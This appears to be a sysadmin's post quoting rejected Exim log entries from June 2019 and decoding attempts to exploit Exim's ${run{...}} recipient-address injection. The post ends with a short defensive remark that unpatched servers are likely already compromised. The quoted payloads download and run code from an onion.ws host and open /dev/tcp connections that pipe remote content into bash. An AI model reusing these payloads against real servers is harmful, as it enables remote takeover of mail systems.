/var/log/exim4/rejectlog-20190615.gz:2019-06-14 15:26:49 H=dyndsl-031-150-241-251.ewe-ip-backbone.de (localhost) [31.150.241.251] F=<> rejected RCPT <${run{\x2Fbin\x2Fsh\t-c\t\x22echo\x20ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K\x7cbase64\x20-d\x7cbash\x22}}@localhost>: Unrouteable address
/var/log/exim4/rejectlog-20190616.gz:2019-06-15 22:39:42 H=(localhost) [163.172.157.143] F=<> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost>: Unrouteable address
/var/log/exim4/rejectlog-20190616.gz:2019-06-15 23:13:22 H=(localhost) [51.15.227.108] F=<localuser@localhost> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x63\x68\x6f\x20\x74\x65\x73\x74\x22\x20\x26}}@localhost>: Sender verify failed
/var/log/exim4/rejectlog-20190617.gz:2019-06-16 10:07:08 H=(localhost) [163.172.157.143] F=<> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x31\x35\x2e\x35\x36\x2e\x31\x36\x31\x2f\x34\x34\x33\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost>: Unrouteable address

$ perl -le 'print "{run{\x2Fbin\x2Fsh\t-c\t\x22echo\x20ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K\x7cbase64\x20-d\x7cbash\x22}}@localhost>"'                                                                        

chmod +x /tmp/exim && /tmp/exim

$ curl -m180 -fsSLkA- aptgetgxqs3secda.onion.ws/systemd-login-e -o exim
curl: (22) The requested URL returned error: 404 Not Found

$ perl -le 'print "\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26"'

I'm not sure how sophisticated these would have been at covering their tracks if they had succeeded - one would expect that they'd remove /tmp/exim at very least.  But it seems pretty likely that if your exim was vulnerable and hasn't yet been patched, you've already been hacked.